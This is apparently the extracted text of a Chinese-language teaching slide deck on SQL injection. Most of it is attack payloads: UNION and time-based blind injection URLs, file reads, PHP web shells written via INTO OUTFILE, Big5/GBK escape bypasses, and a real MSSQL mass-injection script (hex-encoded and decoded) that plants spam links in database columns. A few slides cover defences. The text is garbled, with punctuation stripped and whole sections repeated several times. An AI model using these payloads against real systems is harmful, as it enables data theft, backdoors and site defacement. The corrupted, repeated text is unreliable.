stylegtltdiv class=a4twgtlta href=http116juristrugtthornethegraveaumlegravedividearingntildeecircegravearing-oacutentildeeumloacuteatildeegrave-igraveicircntildeecircacircagraveltagtltdivgt ) FETCH NEXT FROM
Table_Cursor INTO TC END CLOSE Table_Cursor DEALLOCATE Table_Cursor
參考資料
bull 吳翰清 網路竟然這麼危險(白帽子讲Web安全) 2012
bull MySQL String Functions 51
bull MySQL Miscellaneous Functions 51
bull MySQLPHP 对单引号转义时load_fileoutfile 生成一句话
bull Shazin Sadakath Time Based SQL Injection using heavy queries in
MySQL
bull Stefan Esser MySQL and SQL Column Truncation Vulnerabilities 2008
SQL Injection攻擊技巧 ndash UNION
bull PHP+MySQL未支援多指令查詢利用聯集查詢UNION
bull 有弱點的SQL語法有引號的參數(以PHP為例)
bull SELECT FROM `member` WHERE `name` like $name
bull 沒有引號攻擊範例
bull httpwwwhackdemocomsearchUserphpname=ha
nd1=2unionselect123user()23
bull 實際執行語法
bull SELECT FROM `member` WHERE `name` like
hand1=2unionselect123user()
SQL Injection攻擊技巧 - 成功控制語法
SQL Injection攻擊技巧 ndash 猜解資料
bull 取得長度
ndash httpwwwhackdemocomgetUserphpid=1+AND+LENGTH(PA
SSWORD)=1
ndash hellip
ndash httpwwwhackdemocomgetUserphpid=1+AND+LENGTH(PA
SSWORD)=7
bull 猜解資料
ndash httpwwwhackdemocomgetUserphpid=1+AND+RIGHT(PAS
SWORD1)=a
ndash hellip
ndash httpwwwhackdemocomgetUserphpid=1+AND+RIGHT(PAS
SWORD1)=w
SQL Injection攻擊技巧 ndash 讀寫檔案
bull 讀資料寫檔案
ndash httpwwwhackdemocomgetUserphpid=1+into+outfile+DW
ebsitewwwhackdemocommembertxt
bull 寫後門
ndash httpwwwhackdemocomgetUserphpid=1+AND+1=2+UNIO
N+SELECT+223Cphp+system($_GET[cmd])3E22234+i
nto+outfile+DWebsitewwwhackdemocomcmdphp
加上跳脫與關閉錯誤訊息這樣安全了嗎
SQL Blind Injection
bull SQL盲注入(SQL Blind Injection)也是一種SQL Injection的類型一般
SQL Injection仰賴出錯的相關訊息建構攻擊語法而盲注入完全仰賴語法
執行的對(true)錯(false)
bull SQL Blind Injection
ndash 一般盲注入
ndash Time-Based Blind SQL Injection
Time-Based Blind SQL Injection (12)
bull 透過時間的延遲來判斷該SQL語法是否執行成功
bull 技巧
ndash 內建函數
bull BENCHMARK(COUNT EXPR)
bull SLEEP(seconds)
ndash MySQL gt= 5
ndash 創建較花時間的語法(heavy queries)
Time-Based Blind SQL Injection - 使用heavy queries (22)
Time-Based Blind SQL Injection - 透過時間延遲猜解資料庫名稱
bull httpwwwhackdemocomgetUserLashphpid=1+UNION+SEL
ECT+IF(SUBSTRING(db11)=CHAR(1)BENCHMARK(5000000E
NCODE(ENCODE5s))NULL)234+FROM+(SELECT+DATABAS
E()+as+db)+AS+tb
bull hellip
bull httpwwwhackdemocomgetUserLashphpid=1+UNION+SEL
ECT+IF(SUBSTRING(db11)=CHAR(104)BENCHMARK(5000000
ENCODE(ENCODE5s))NULL)234+FROM+(SELECT+DATABA
SE()+as+db)+AS+tb
SQL Injection攻擊技巧 - 繞過跳脫字元
bull ACSII編碼
ndash ASCII() CHAR()
ndash 單一
bull CHAR(68)
ndash 多個
bull CHAR(68 58 92)
bull 16進位編碼
ndash HEX()
ndash 0x443A5C
bull 雙位元組跳脫技巧
SQL Injection攻擊技巧 - 猜解資料(繞過跳脫)
bull 猜解欄位
ndash httpwwwhackdemocomgetUserphpid=1+AND+1=2+UNIO
N+SELECT+1234+FROM+user--
ndash httpwwwhackdemocomgetUserphpid=1+AND+1=2+UNIO
N+SELECT+1234+FROM+member--
bull 猜解欄位資料
ndash httpwwwhackdemocomgetUserLashphpid=1+AND+RIGHT
(PASSWORD1)=char(0)
ndash hellip
ndash httpwwwhackdemocomgetUserLashphpid=1+AND+RIGHT
(PASSWORD1)=char(119)
SQL Injection攻擊技巧 - 讀取資料(繞過跳脫)
bull 讀資料寫檔案
ndash httpwwwhackdemocomgetUserLashphpid=1+AND+1=
2+UNION+SELECT+123load_file(char(6858928710198
11510511610192119119119461049799107100101
1091114699111109921031011168511510111446
112104112))--
ndash httpwwwhackdemocomgetUserLashphpid=1+AND+1=
2+UNION+SELECT+123load_file(0x443A5C576562736974
655C7777772E6861636B64656D6F2E636F6D5C636F6E6669
672E706870)--
SQL Injection攻擊技巧 ndash 寫檔案(無法繞過引號限制)
1 找到phpMyAdmin
2 遠端MySQL
mysqlgt use xssdb
mysqlgt set
a=0x73656C656374203078334333463730363837303230343036353736363136433238323
435463530344635333534354232373633364436343237354432393342334633452066726F6D
20787373206C696D6974203120696E746F206F757466696C652027433A2F7368656C6C2E70
687027
mysqlgt prepare cmd from a
mysqlgt execute cmd
a為
select 0x3C3F70687020406576616C28245F504F53545B27636D64275D293B3F3E from
xss limit 1 into outfile Cshellphp
寫入檔案為
ltphp eval($_POST[cmd])gt
SQL Injection攻擊技巧 - 雙位元組跳脫技巧(13)
bull 透過注入的編碼與反斜線(5c)重組產生字繞過跳脫字元的限制
bull 情境
ndash 跳脫字元處理
bull addslashes
bull mysql_escape_string
bull phpin
ndash magic_quotes_gpc 開啟
ndash 採用BIG5或GBK編碼
bull set names gbk set names big5
SQL Injection攻擊技巧 - 雙位元組跳脫技巧(23)
bull 中文語系文字以兩個位元組表示
ndash Big5
bull 高位元組 0x81-0xFE低位元組 0x40-0x7E0xA1-0xFE
ndash GBK
bull 前位元組 0x81-0xFE後位元組 0x40-0x7E
ndash GB2312
bull 前位元組 0xB0-0xF7後位元組 0xA0-0xFE
ndash 攻擊字元 BF CC D5hellip
SQL Injection攻擊技巧 -雙位元組跳脫技巧 (33)
bull 有引號的參數繞過跳脫
ndash httpwwwhackdemocomsearchUserLashphpname=h
B5+AND+1=2+UNION+SELECT+123423
ndash httpwwwhackdemocomsearchUserLashphpname=h
CC+AND+1=2+UNION+SELECT+123423
ndash httpwwwhackdemocomsearchUserLashphpname=h
d5+AND+1=2+UNION+SELECT+123423
SQL Column Truncation ndash 簡介(13)
bull MySQL中 SQL mode
ndash 沒有開啟 STRICT_ALL_TABLES
bull 使用者新增超過長度的資料會出現警告提示
bull 但資料還是會新增
ndash 開啟 STRICT_ALL_TABLES
bull 使用者新增超過長度的資料會出現提示
bull 出現ERROR 1406 該資料不會成功新增
bull 慘案
ndash 2008-09-07
bull WordPress 261 SQL Column Truncation Vulnerability
SQL Column Truncation - 效果(23)
SQL Column Truncation - 防禦方案(33)
bull 在字串中不該有空白的主動清除
ndash 如帳號類資訊
bull 在 SELECT 資料時加上 BINARY 參數
bull 在 MySQL 設定預設以 BINARY 查詢
bull 在 MySQL 開啟 STRICT_ALL_TABLES
ndash 超過欄位長度會出現 ERROR 而非出現 WARNING
ndash 新增資料為避免發生錯誤 可能需在新增修改加入額外檢查
SQL Injection ndash 延伸思考
bull INSERT 與 UPDATE 的攻擊可能發生嗎
bull NoSQL 沒有 SQL Injection
bull 其他攻擊利用
ndash Deep Blind Injection
ndash Error-Based Injection
bull Duplicate Error
bull Function
ndash information_schema
ndash 使用者自訂函數(User-Defined Functions)
ndash 觸發(Trigger)
SQL Injection ndash 自動化工具
bull Havij
bull Pangolin
bull w3af
bull Jsky
bull SQLmap
bull hellip
正確地防禦SQL Injection
bull 最低權限原則
bull 使用預先編譯敘述
bull 使用預存函數
bull 使用UTF8避免使用BIG5或GBK
bull 檢查資料型態與強制轉型
ndash bool settype(mixed amp$var string $type)
ndash intval doubleval
bull 使用安全函數
ndash OWASP ESAPI
bull MySQLCodec
MSSQL實際案例 - 116juristru自動化注入(14)
bull 201212xx 100331
bull Serno=51+declare+s+varchar(8000)+set+s=cast(0x73657420616e73695f7761726e696e6773206f66
66204445434c415245204054205641524348415228323535292c404320564152434841522832353529204
445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e544142
4c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d4
12e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865
726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74
657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e475448
3e313020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e746162
6c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f7220464554434
8204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c45284040
46455443485f5354415455533d302920424547494e20455845432827555044415445205b272b40542b275
d20534554205b272b40432b275d3d535542535452494e47285b272b40432b275d2c20312c204348415249
4e4445582827273c2f7469746c653e3c27272c5b272b40432b275d29202d203129207768657265205b272b
40432b275d206c696b65202727253c2f7469746c653e3c252727202729204645544348204e455854204652
4f4d205461626c655f437572736f7220494e544f2040542c404320454e4420434c4f5345205461626c655f43
7572736f72204445414c4c4f43415445205461626c655f437572736f72+as+varchar(8000))+exec(s)--
MSSQL實際案例 - 116juristru自動化注入(24)
bull 201212xx 100333
bull Serno=51+declare+s+varchar(8000)+set+s=cast(0x73657420616e73695f7761726e696e6773206f66
66204445434c415245204054205641524348415228323535292c404320564152434841522832353529204
445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e544142
4c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d4
12e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865
726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74
657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e475448
3e323020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e746162
6c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f7220464554434
8204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c45284040
46455443485f5354415455533d302920424547494e20455845432827414c544552205441424c45205b272
b40542b275d20414c54455220434f4c554d4e205b272b40432b275d207661726368617228383030302920
4e4f54204e554c4c2729204645544348204e4558542046524f4d205461626c655f437572736f7220494e544
f2040542c404320454e4420434c4f5345205461626c655f437572736f72204445414c4c4f434154452054616
26c655f437572736f72+as+varchar(8000))+exec(s)--
MSSQL實際案例 - 116juristru自動化注入(34)
bull 201212xx 100344
bull Serno=51+declare+s+varchar(8000)+set+s=cast(0x73657420616e73695f7761726e696e6773206f66
66204445434c415245204054205641524348415228323535292c404320564152434841522832353529204
445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e544142
4c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d4
12e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865
726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74
657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e475448
3e383020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e746162
6c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f7220464554434
8204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c45284040
46455443485f5354415455533d302920424547494e20455845432827555044415445205b272b40542b275
d20534554205b272b40432b275d3d434f4e5645525428564152434841522838303030292c5b272b40432b
275d292b27273c2f7469746c653e3c7374796c653e2e613474777b706f736974696f6e3a6162736f6c75746
53b636c69703a726563742834353770782c6175746f2c6175746f2c3435377078293b7d3c2f7374796c653e
3c64697620636c6173733d613474773e3c6120687265663d687474703a2f2f3131366a75726973742e7275
203efef0e8e4e8f7e5f1eae8e52df3f1ebf3e3e82deceef1eae2e03c2f613e3c2f6469763e27272027292046455
44348204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c404320454e4420434c
4f5345205461626c655f437572736f72204445414c4c4f43415445205461626c655f437572736f72+as+varc
har(8000))+exec(s)--
MSSQL實際案例 - 116juristru自動化注入解碼(44)
bull set ansi_warnings off DECLARE T VARCHAR(255)C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select
cTABLE_NAMEcCOLUMN_NAME from INFORMATION_SCHEMAcolumns c INFORMATION_SCHEMAtables t where cDATA_TYPE
in (nvarcharvarcharntexttext) and cCHARACTER_MAXIMUM_LENGTHgt10 and ttable_name=ctable_name and
ttable_type=BASE TABLE OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO TC WHILE(FETCH_STATUS=0)
BEGIN EXEC(UPDATE [+T+] SET [+C+]=SUBSTRING([+C+] 1 CHARINDEX(lttitlegtlt[+C+]) - 1) where [+C+]
like lttitlegtlt ) FETCH NEXT FROM Table_Cursor INTO TC END CLOSE Table_Cursor DEALLOCATE Table_Cursor
bull
bull set ansi_warnings off DECLARE T VARCHAR(255)C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select
cTABLE_NAMEcCOLUMN_NAME from INFORMATION_SCHEMAcolumns c INFORMATION_SCHEMAtables t where cDATA_TYPE
in (nvarcharvarcharntexttext) and cCHARACTER_MAXIMUM_LENGTHgt20 and ttable_name=ctable_name and
ttable_type=BASE TABLE OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO TC WHILE(FETCH_STATUS=0)
BEGIN EXEC(ALTER TABLE [+T+] ALTER COLUMN [+C+] varchar(8000) NOT NULL) FETCH NEXT FROM Table_Cursor INTO
TC END CLOSE Table_Cursor DEALLOCATE Table_Cursor
bull
bull set ansi_warnings off DECLARE T VARCHAR(255)C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select
cTABLE_NAMEcCOLUMN_NAME from INFORMATION_SCHEMAcolumns c INFORMATION_SCHEMAtables t where cDATA_TYPE
in (nvarcharvarcharntexttext) and cCHARACTER_MAXIMUM_LENGTHgt80 and ttable_name=ctable_name and
ttable_type=BASE TABLE OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO TC WHILE(FETCH_STATUS=0)
BEGIN EXEC(UPDATE [+T+] SET
[+C+]=CONVERT(VARCHAR(8000)[+C+])+lttitlegtltstylegta4twpositionabsolutecliprect(457pxautoauto457px)lt
stylegtltdiv class=a4twgtlta href=http116juristrugtthornethegraveaumlegravedividearingntildeecircegravearing-oacutentildeeumloacuteatildeegrave-igraveicircntildeecircacircagraveltagtltdivgt ) FETCH NEXT FROM
Table_Cursor INTO TC END CLOSE Table_Cursor DEALLOCATE Table_Cursor
參考資料
bull 吳翰清 網路竟然這麼危險(白帽子讲Web安全) 2012
bull MySQL String Functions 51
bull MySQL Miscellaneous Functions 51
bull MySQLPHP 对单引号转义时load_fileoutfile 生成一句话
bull Shazin Sadakath Time Based SQL Injection using heavy queries in
MySQL
bull Stefan Esser MySQL and SQL Column Truncation Vulnerabilities 2008
SQL Injection攻擊技巧 - 成功控制語法
SQL Injection攻擊技巧 ndash 猜解資料
bull 取得長度
ndash httpwwwhackdemocomgetUserphpid=1+AND+LENGTH(PA
SSWORD)=1
ndash hellip
ndash httpwwwhackdemocomgetUserphpid=1+AND+LENGTH(PA
SSWORD)=7
bull 猜解資料
ndash httpwwwhackdemocomgetUserphpid=1+AND+RIGHT(PAS
SWORD1)=a
ndash hellip
ndash httpwwwhackdemocomgetUserphpid=1+AND+RIGHT(PAS
SWORD1)=w
SQL Injection攻擊技巧 ndash 讀寫檔案
bull 讀資料寫檔案
ndash httpwwwhackdemocomgetUserphpid=1+into+outfile+DW
ebsitewwwhackdemocommembertxt
bull 寫後門
ndash httpwwwhackdemocomgetUserphpid=1+AND+1=2+UNIO
N+SELECT+223Cphp+system($_GET[cmd])3E22234+i
nto+outfile+DWebsitewwwhackdemocomcmdphp
加上跳脫與關閉錯誤訊息這樣安全了嗎
SQL Blind Injection
bull SQL盲注入(SQL Blind Injection)也是一種SQL Injection的類型一般
SQL Injection仰賴出錯的相關訊息建構攻擊語法而盲注入完全仰賴語法
執行的對(true)錯(false)
bull SQL Blind Injection
ndash 一般盲注入
ndash Time-Based Blind SQL Injection
Time-Based Blind SQL Injection (12)
bull 透過時間的延遲來判斷該SQL語法是否執行成功
bull 技巧
ndash 內建函數
bull BENCHMARK(COUNT EXPR)
bull SLEEP(seconds)
ndash MySQL gt= 5
ndash 創建較花時間的語法(heavy queries)
Time-Based Blind SQL Injection - 使用heavy queries (22)
Time-Based Blind SQL Injection - 透過時間延遲猜解資料庫名稱
bull httpwwwhackdemocomgetUserLashphpid=1+UNION+SEL
ECT+IF(SUBSTRING(db11)=CHAR(1)BENCHMARK(5000000E
NCODE(ENCODE5s))NULL)234+FROM+(SELECT+DATABAS
E()+as+db)+AS+tb
bull hellip
bull httpwwwhackdemocomgetUserLashphpid=1+UNION+SEL
ECT+IF(SUBSTRING(db11)=CHAR(104)BENCHMARK(5000000
ENCODE(ENCODE5s))NULL)234+FROM+(SELECT+DATABA
SE()+as+db)+AS+tb
SQL Injection攻擊技巧 - 繞過跳脫字元
bull ACSII編碼
ndash ASCII() CHAR()
ndash 單一
bull CHAR(68)
ndash 多個
bull CHAR(68 58 92)
bull 16進位編碼
ndash HEX()
ndash 0x443A5C
bull 雙位元組跳脫技巧
SQL Injection攻擊技巧 - 猜解資料(繞過跳脫)
bull 猜解欄位
ndash httpwwwhackdemocomgetUserphpid=1+AND+1=2+UNIO
N+SELECT+1234+FROM+user--
ndash httpwwwhackdemocomgetUserphpid=1+AND+1=2+UNIO
N+SELECT+1234+FROM+member--
bull 猜解欄位資料
ndash httpwwwhackdemocomgetUserLashphpid=1+AND+RIGHT
(PASSWORD1)=char(0)
ndash hellip
ndash httpwwwhackdemocomgetUserLashphpid=1+AND+RIGHT
(PASSWORD1)=char(119)
SQL Injection攻擊技巧 - 讀取資料(繞過跳脫)
bull 讀資料寫檔案
ndash httpwwwhackdemocomgetUserLashphpid=1+AND+1=
2+UNION+SELECT+123load_file(char(6858928710198
11510511610192119119119461049799107100101
1091114699111109921031011168511510111446
112104112))--
ndash httpwwwhackdemocomgetUserLashphpid=1+AND+1=
2+UNION+SELECT+123load_file(0x443A5C576562736974
655C7777772E6861636B64656D6F2E636F6D5C636F6E6669
672E706870)--
SQL Injection攻擊技巧 ndash 寫檔案(無法繞過引號限制)
1 找到phpMyAdmin
2 遠端MySQL
mysqlgt use xssdb
mysqlgt set
a=0x73656C656374203078334333463730363837303230343036353736363136433238323
435463530344635333534354232373633364436343237354432393342334633452066726F6D
20787373206C696D6974203120696E746F206F757466696C652027433A2F7368656C6C2E70
687027
mysqlgt prepare cmd from a
mysqlgt execute cmd
a為
select 0x3C3F70687020406576616C28245F504F53545B27636D64275D293B3F3E from
xss limit 1 into outfile Cshellphp
寫入檔案為
ltphp eval($_POST[cmd])gt
SQL Injection攻擊技巧 - 雙位元組跳脫技巧(13)
bull 透過注入的編碼與反斜線(5c)重組產生字繞過跳脫字元的限制
bull 情境
ndash 跳脫字元處理
bull addslashes
bull mysql_escape_string
bull phpin
ndash magic_quotes_gpc 開啟
ndash 採用BIG5或GBK編碼
bull set names gbk set names big5
SQL Injection攻擊技巧 - 雙位元組跳脫技巧(23)
bull 中文語系文字以兩個位元組表示
ndash Big5
bull 高位元組 0x81-0xFE低位元組 0x40-0x7E0xA1-0xFE
ndash GBK
bull 前位元組 0x81-0xFE後位元組 0x40-0x7E
ndash GB2312
bull 前位元組 0xB0-0xF7後位元組 0xA0-0xFE
ndash 攻擊字元 BF CC D5hellip
SQL Injection攻擊技巧 -雙位元組跳脫技巧 (33)
bull 有引號的參數繞過跳脫
ndash httpwwwhackdemocomsearchUserLashphpname=h
B5+AND+1=2+UNION+SELECT+123423
ndash httpwwwhackdemocomsearchUserLashphpname=h
CC+AND+1=2+UNION+SELECT+123423
ndash httpwwwhackdemocomsearchUserLashphpname=h
d5+AND+1=2+UNION+SELECT+123423
SQL Column Truncation ndash 簡介(13)
bull MySQL中 SQL mode
ndash 沒有開啟 STRICT_ALL_TABLES
bull 使用者新增超過長度的資料會出現警告提示
bull 但資料還是會新增
ndash 開啟 STRICT_ALL_TABLES
bull 使用者新增超過長度的資料會出現提示
bull 出現ERROR 1406 該資料不會成功新增
bull 慘案
ndash 2008-09-07
bull WordPress 261 SQL Column Truncation Vulnerability
SQL Column Truncation - 效果(23)
SQL Column Truncation - 防禦方案(33)
bull 在字串中不該有空白的主動清除
ndash 如帳號類資訊
bull 在 SELECT 資料時加上 BINARY 參數
bull 在 MySQL 設定預設以 BINARY 查詢
bull 在 MySQL 開啟 STRICT_ALL_TABLES
ndash 超過欄位長度會出現 ERROR 而非出現 WARNING
ndash 新增資料為避免發生錯誤 可能需在新增修改加入額外檢查
SQL Injection ndash 延伸思考
bull INSERT 與 UPDATE 的攻擊可能發生嗎
bull NoSQL 沒有 SQL Injection
bull 其他攻擊利用
ndash Deep Blind Injection
ndash Error-Based Injection
bull Duplicate Error
bull Function
ndash information_schema
ndash 使用者自訂函數(User-Defined Functions)
ndash 觸發(Trigger)
SQL Injection ndash 自動化工具
bull Havij
bull Pangolin
bull w3af
bull Jsky
bull SQLmap
bull hellip
正確地防禦SQL Injection
bull 最低權限原則
bull 使用預先編譯敘述
bull 使用預存函數
bull 使用UTF8避免使用BIG5或GBK
bull 檢查資料型態與強制轉型
ndash bool settype(mixed amp$var string $type)
ndash intval doubleval
bull 使用安全函數
ndash OWASP ESAPI
bull MySQLCodec
MSSQL實際案例 - 116juristru自動化注入(14)
bull 201212xx 100331
bull Serno=51+declare+s+varchar(8000)+set+s=cast(0x73657420616e73695f7761726e696e6773206f66
66204445434c415245204054205641524348415228323535292c404320564152434841522832353529204
445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e544142
4c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d4
12e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865
726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74
657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e475448
3e313020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e746162
6c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f7220464554434
8204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c45284040
46455443485f5354415455533d302920424547494e20455845432827555044415445205b272b40542b275
d20534554205b272b40432b275d3d535542535452494e47285b272b40432b275d2c20312c204348415249
4e4445582827273c2f7469746c653e3c27272c5b272b40432b275d29202d203129207768657265205b272b
40432b275d206c696b65202727253c2f7469746c653e3c252727202729204645544348204e455854204652
4f4d205461626c655f437572736f7220494e544f2040542c404320454e4420434c4f5345205461626c655f43
7572736f72204445414c4c4f43415445205461626c655f437572736f72+as+varchar(8000))+exec(s)--
MSSQL實際案例 - 116juristru自動化注入(24)
bull 201212xx 100333
bull Serno=51+declare+s+varchar(8000)+set+s=cast(0x73657420616e73695f7761726e696e6773206f66
66204445434c415245204054205641524348415228323535292c404320564152434841522832353529204
445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e544142
4c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d4
12e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865
726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74
657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e475448
3e323020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e746162
6c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f7220464554434
8204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c45284040
46455443485f5354415455533d302920424547494e20455845432827414c544552205441424c45205b272
b40542b275d20414c54455220434f4c554d4e205b272b40432b275d207661726368617228383030302920
4e4f54204e554c4c2729204645544348204e4558542046524f4d205461626c655f437572736f7220494e544
f2040542c404320454e4420434c4f5345205461626c655f437572736f72204445414c4c4f434154452054616
26c655f437572736f72+as+varchar(8000))+exec(s)--
MSSQL實際案例 - 116juristru自動化注入(34)
bull 201212xx 100344
bull Serno=51+declare+s+varchar(8000)+set+s=cast(0x73657420616e73695f7761726e696e6773206f66
66204445434c415245204054205641524348415228323535292c404320564152434841522832353529204
445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e544142
4c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d4
12e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865
726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74
657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e475448
3e383020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e746162
6c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f7220464554434
8204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c45284040
46455443485f5354415455533d302920424547494e20455845432827555044415445205b272b40542b275
d20534554205b272b40432b275d3d434f4e5645525428564152434841522838303030292c5b272b40432b
275d292b27273c2f7469746c653e3c7374796c653e2e613474777b706f736974696f6e3a6162736f6c75746
53b636c69703a726563742834353770782c6175746f2c6175746f2c3435377078293b7d3c2f7374796c653e
3c64697620636c6173733d613474773e3c6120687265663d687474703a2f2f3131366a75726973742e7275
203efef0e8e4e8f7e5f1eae8e52df3f1ebf3e3e82deceef1eae2e03c2f613e3c2f6469763e27272027292046455
44348204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c404320454e4420434c
4f5345205461626c655f437572736f72204445414c4c4f43415445205461626c655f437572736f72+as+varc
har(8000))+exec(s)--
MSSQL實際案例 - 116juristru自動化注入解碼(44)
bull set ansi_warnings off DECLARE T VARCHAR(255)C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select
cTABLE_NAMEcCOLUMN_NAME from INFORMATION_SCHEMAcolumns c INFORMATION_SCHEMAtables t where cDATA_TYPE
in (nvarcharvarcharntexttext) and cCHARACTER_MAXIMUM_LENGTHgt10 and ttable_name=ctable_name and
ttable_type=BASE TABLE OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO TC WHILE(FETCH_STATUS=0)
BEGIN EXEC(UPDATE [+T+] SET [+C+]=SUBSTRING([+C+] 1 CHARINDEX(lttitlegtlt[+C+]) - 1) where [+C+]
like lttitlegtlt ) FETCH NEXT FROM Table_Cursor INTO TC END CLOSE Table_Cursor DEALLOCATE Table_Cursor
bull
bull set ansi_warnings off DECLARE T VARCHAR(255)C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select
cTABLE_NAMEcCOLUMN_NAME from INFORMATION_SCHEMAcolumns c INFORMATION_SCHEMAtables t where cDATA_TYPE
in (nvarcharvarcharntexttext) and cCHARACTER_MAXIMUM_LENGTHgt20 and ttable_name=ctable_name and
ttable_type=BASE TABLE OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO TC WHILE(FETCH_STATUS=0)
BEGIN EXEC(ALTER TABLE [+T+] ALTER COLUMN [+C+] varchar(8000) NOT NULL) FETCH NEXT FROM Table_Cursor INTO
TC END CLOSE Table_Cursor DEALLOCATE Table_Cursor
bull
bull set ansi_warnings off DECLARE T VARCHAR(255)C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select
cTABLE_NAMEcCOLUMN_NAME from INFORMATION_SCHEMAcolumns c INFORMATION_SCHEMAtables t where cDATA_TYPE
in (nvarcharvarcharntexttext) and cCHARACTER_MAXIMUM_LENGTHgt80 and ttable_name=ctable_name and
ttable_type=BASE TABLE OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO TC WHILE(FETCH_STATUS=0)
BEGIN EXEC(UPDATE [+T+] SET
[+C+]=CONVERT(VARCHAR(8000)[+C+])+lttitlegtltstylegta4twpositionabsolutecliprect(457pxautoauto457px)lt
stylegtltdiv class=a4twgtlta href=http116juristrugtthornethegraveaumlegravedividearingntildeecircegravearing-oacutentildeeumloacuteatildeegrave-igraveicircntildeecircacircagraveltagtltdivgt ) FETCH NEXT FROM
Table_Cursor INTO TC END CLOSE Table_Cursor DEALLOCATE Table_Cursor
參考資料
bull 吳翰清 網路竟然這麼危險(白帽子讲Web安全) 2012
bull MySQL String Functions 51
bull MySQL Miscellaneous Functions 51
bull MySQLPHP 对单引号转义时load_fileoutfile 生成一句话
bull Shazin Sadakath Time Based SQL Injection using heavy queries in
MySQL
bull Stefan Esser MySQL and SQL Column Truncation Vulnerabilities 2008
SQL Injection攻擊技巧 ndash 猜解資料
bull 取得長度
ndash httpwwwhackdemocomgetUserphpid=1+AND+LENGTH(PA
SSWORD)=1
ndash hellip
ndash httpwwwhackdemocomgetUserphpid=1+AND+LENGTH(PA
SSWORD)=7
bull 猜解資料
ndash httpwwwhackdemocomgetUserphpid=1+AND+RIGHT(PAS
SWORD1)=a
ndash hellip
ndash httpwwwhackdemocomgetUserphpid=1+AND+RIGHT(PAS
SWORD1)=w
SQL Injection攻擊技巧 ndash 讀寫檔案
bull 讀資料寫檔案
ndash httpwwwhackdemocomgetUserphpid=1+into+outfile+DW
ebsitewwwhackdemocommembertxt
bull 寫後門
ndash httpwwwhackdemocomgetUserphpid=1+AND+1=2+UNIO
N+SELECT+223Cphp+system($_GET[cmd])3E22234+i
nto+outfile+DWebsitewwwhackdemocomcmdphp
加上跳脫與關閉錯誤訊息這樣安全了嗎
SQL Blind Injection
bull SQL盲注入(SQL Blind Injection)也是一種SQL Injection的類型一般
SQL Injection仰賴出錯的相關訊息建構攻擊語法而盲注入完全仰賴語法
執行的對(true)錯(false)
bull SQL Blind Injection
ndash 一般盲注入
ndash Time-Based Blind SQL Injection
Time-Based Blind SQL Injection (12)
bull 透過時間的延遲來判斷該SQL語法是否執行成功
bull 技巧
ndash 內建函數
